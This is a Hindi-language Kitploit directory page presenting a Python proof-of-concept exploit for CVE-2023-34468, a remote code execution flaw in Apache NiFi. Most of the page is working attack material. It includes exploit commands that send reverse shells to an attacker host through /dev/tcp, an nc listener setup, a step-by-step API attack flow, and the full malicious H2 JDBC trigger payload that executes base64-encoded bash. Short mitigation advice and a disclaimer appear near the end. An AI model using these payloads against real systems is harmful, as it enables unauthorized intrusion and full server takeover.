Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/jeanpt/cve-2023-34468
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubjeanpt/cve-2023-34468

CVE-2023-34468

CVE-2023-34468 - Apache NiFi H2 RCE PoC

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-34468 एक्सप्लॉइट

GitHub stars GitHub license

अवलोकन

यह रिपॉज़िटरी CVE-2023-34468 के लिए एक Python-आधारित एक्सप्लॉइट टूल प्रदान करती है, जो Apache NiFi संस्करण 0.0.2 से 1.21.0 में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता (CVSS 9.8) है। यह प्रमाणित उपयोगकर्ताओं को एम्बेडेड ट्रिगर्स के साथ H2 डेटाबेस कनेक्शन स्ट्रिंग्स में हेरफेर करके मनमाना कोड निष्पादित करने की अनुमति देता है।

⚠️ चेतावनी: केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

भेद्यता विवरण

  • CVE ID: CVE-2023-34468
  • प्रभावित संस्करण: Apache NiFi 0.0.2–1.21.0
  • प्रभाव: रिमोट कोड एक्ज़ीक्यूशन (RCE)
  • CVSS स्कोर: 9.8 (गंभीर)
  • खोज तिथि: 12 जून, 2023
  • विवरण: DBCPConnectionPool और HikariCPConnectionPool कंट्रोलर सर्विसेज़ उपयोगकर्ताओं को H2 ड्राइवर के साथ एक डेटाबेस URL कॉन्फ़िगर करने की अनुमति देती हैं, जो H2 की CREATE TRIGGER कार्यक्षमता के माध्यम से मनमाना Java कोड निष्पादन सक्षम बनाती है। जब कनेक्शन प्रारंभ होता है, तो एम्बेडेड JavaScript कोड NiFi के विशेषाधिकारों के साथ निष्पादित होता है।

पूर्वापेक्षाएँ

  • Python 3.7+
  • requests लाइब्रेरी
  • NiFi API तक नेटवर्क पहुँच (डिफ़ॉल्ट पोर्ट 8080 या 8443)
  • बिना प्रमाणीकरण वाला लक्षित NiFi इंस्टेंस या मान्य क्रेडेंशियल्स
  • रिवर्स शेल के लिए लिसनर सेटअप (जैसे, nc -lnvp 5555)

त्वरित आरंभ

क्लोन और इंस्टॉल करें

root@kitploit:~
git clone https://github.com/Jeanpt/CVE-2023-34468.git
cd CVE-2023-34468
pip install -r requirements.txt

बिना प्रमाणीकरण वाला NiFi (कोई क्रेडेंशियल्स आवश्यक नहीं)

root@kitploit:~
# अपना लिसनर शुरू करें
nc -lnvp 5555

# एक्सप्लॉइट चलाएँ — auth स्वतः-पता लगाया जाता है, खुले इंस्टेंस के लिए कोई फ्लैग आवश्यक नहीं
python3 exploit.py \
  -t http://nifi.target.com:8080 \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
  -lh ATTACKER_IP \
  -lp 5555

प्रमाणित NiFi (यूज़रनेम/पासवर्ड)

root@kitploit:~
python3 exploit.py \
  -t https://nifi.target.com:8443 \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
  -lh ATTACKER_IP \
  -lp 5555 \
  -u admin -p password123

प्रमाणित NiFi (बियरर टोकन)

root@kitploit:~
python3 exploit.py \
  -t https://nifi.target.com:8443 \
  -c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
  -lh ATTACKER_IP \
  -lp 5555 \
  --token <your_bearer_token>

क्लीनअप छोड़ें (लक्ष्य पर आर्टिफैक्ट्स छोड़ें)

root@kitploit:~
python3 exploit.py -t http://target:8080 -c "..." -lh ATTACKER_IP -lp 5555 --no-cleanup

सभी विकल्प

root@kitploit:~
python3 exploit.py --help

सत्यापन: रिवर्स शेल कनेक्शन के लिए अपना लिसनर जाँचें। कोड निष्पादन की पुष्टि के लिए id चलाएँ।

यह कैसे काम करता है (तकनीकी विवरण)

अटैक फ्लो

  1. रीकॉनिसांस: /nifi-api/system-diagnostics के माध्यम से NiFi संस्करण की पहचान करें
  2. DBCP सर्विस बनाएँ: /nifi-api/process-groups/root/controller-services पर दुर्भावनापूर्ण H2 कनेक्शन स्ट्रिंग POST करें
  3. प्रोसेसर बनाएँ: उसी प्रोसेस ग्रुप में ExecuteSQL प्रोसेसर POST करें
  4. प्रोसेसर कॉन्फ़िगर करें: प्रोसेसर को दुर्भावनापूर्ण DBCP सर्विस से संबद्ध करें
  5. सर्विस सक्षम करें: state ENABLED के साथ /nifi-api/controller-services/{id}/run-status पर PUT करें
  6. RCE ट्रिगर करें: state RUNNING के साथ /nifi-api/processors/{id}/run-status पर PUT करें — कनेक्शन पर H2 ट्रिगर सक्रिय होता है

H2 पेलोड संरचना

root@kitploit:~
jdbc:h2:file:/tmp/{random_db}.db;TRACE_LEVEL_SYSTEM_OUT=0\;CREATE TRIGGER {random_name}
BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64_PAYLOAD}|{base64,-d}|{bash,-i}')
$$--=x

मुख्य बिंदु:

  • सेमीकोलन को बैकस्लैश से एस्केप करें: \;
  • JavaScript BEFORE SELECT ON INFORMATION_SCHEMA.TABLES पर सक्रिय होता है (स्वतः-ट्रिगर्ड)
  • विशेष वर्ण समस्याओं से बचने के लिए पेलोड को Base64 एन्कोड करें
  • H2 पार्सिंग समस्याओं से बचने के लिए पैडिंग बराबर चिह्नों को स्पेस से बदल दिया जाता है

पेलोड उदाहरण

रिवर्स शेल

root@kitploit:~
# एक्सप्लॉइट सीधे चलाएँ
python3 exploit.py -t http://target:8080 -c "bash -i >& /dev/tcp/10.10.16.46/5555 0>&1" -lh 10.10.16.46 -lp 5555

कमांड निष्पादन

root@kitploit:~
python3 exploit.py -t http://target:8080 -c "touch /tmp/pwned" -lh 127.0.0.1 -lp 5555

शमन (मिटिगेशन)

  • अपडेट करें: Apache NiFi 1.22.0 या उसके बाद के संस्करण में अपग्रेड करें
  • एक्सेस नियंत्रण: फ़ायरवॉल/WAF के माध्यम से NiFi API पहुँच प्रतिबंधित करें
  • प्रमाणीकरण: NiFi पर प्रमाणीकरण सक्षम और लागू करें
  • निगरानी: असामान्य कंट्रोलर सर्विस कॉन्फ़िगरेशन पर अलर्ट करें
  • नेटवर्क सेगमेंटेशन: NiFi को अविश्वसनीय नेटवर्क से अलग रखें

संदर्भ

  • NVD - CVE-2023-34468
  • Apache NiFi सुरक्षा सलाह
  • NIFI-11653 - इश्यू ट्रैकर
  • Apache मेलिंग लिस्ट चर्चा

अस्वीकरण

यह टूल केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए प्रदान किया गया है। लेखक इस एक्सप्लॉइट के दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। केवल अधिकृत वातावरण में ही ज़िम्मेदारी से परीक्षण करें।

क्रेडिट्स

  • खोज: Matei "Mal" Badanoiu
  • Metasploit मॉड्यूल: h00die
  • Python POC: Jean

लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें


सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण के लिए निर्मित।

Topics: apache-nifi h2-database rce exploit cve-2023-34468 python security-research

टूल डाउनलोड करें
कमांडविवरण
-t, --targetलक्षित NiFi इंस्टेंस URL (आवश्यक)
-c, --commandनिष्पादित करने हेतु कमांड (आवश्यक)
-lh, --lhostकॉलबैक के लिए लिसनर होस्ट (आवश्यक)
-lp, --lportकॉलबैक के लिए लिसनर पोर्ट (आवश्यक)
-u, --usernameNiFi यूज़रनेम (प्रमाणित इंस्टेंस)
-p, --passwordNiFi पासवर्ड (प्रमाणित इंस्टेंस)
--tokenबियरर टोकन (प्रमाणित इंस्टेंस)
--no-cleanupएक्सप्लॉइटेशन के बाद क्लीनअप छोड़ें
--delayक्लीनअप से पहले प्रतीक्षा हेतु सेकंड (डिफ़ॉल्ट: 10)
--driver-pathH2 ड्राइवर jar पथ ओवरराइड करें (डिफ़ॉल्ट रूप से छोड़ा गया)